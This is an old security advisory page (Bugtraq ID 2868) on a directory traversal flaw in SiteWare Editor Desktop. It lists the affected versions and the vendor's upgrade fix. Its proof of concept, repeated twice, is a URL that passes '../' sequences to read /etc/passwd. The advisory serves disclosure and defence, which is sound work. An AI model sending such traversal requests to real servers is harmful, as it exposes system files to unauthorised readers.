SiteWare Editor Desktop Directory Traversal Vulnerability
BID:2868
Info
SiteWare Editor Desktop Directory Traversal Vulnerability
| Bugtraq ID: | 2868 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 13 2001 12:00AM |
| Updated: | Jun 13 2001 12:00AM |
| Credit: | This vulnerability was reported to BugTraq on June 11th, 2001 by Foundstone Labs <[email protected]>. |
| Vulnerable: |
Screaming Media SiteWare 3.1 Screaming Media SiteWare 3.0 2 Screaming Media SiteWare 3.0 1 Screaming Media SiteWare 3.0 Screaming Media SiteWare 2.5 01 Screaming Media SiteWare 2.5 |
| Not Vulnerable: |
Screaming Media SiteWare 3.1.1 Screaming Media SiteWare 2.5.1 |
Exploit / POC
SiteWare Editor Desktop Directory Traversal Vulnerability
An example was provided by Foundstone Labs <[email protected]>:
From a browser, make the following URL request:
http://server:port/SWEditServlet?station_path=Z&publication_id=2043&template=../../../../../../../etc/passwd
An example was provided by Foundstone Labs <[email protected]>:
From a browser, make the following URL request:
http://server:port/SWEditServlet?station_path=Z&publication_id=2043&template=../../../../../../../etc/passwd
Solution / Fix
SiteWare Editor Desktop Directory Traversal Vulnerability
Solution:
The vendor has released a free software upgrade to address this issue and should be contacted at:
<[email protected]>
Solution:
The vendor has released a free software upgrade to address this issue and should be contacted at:
<[email protected]>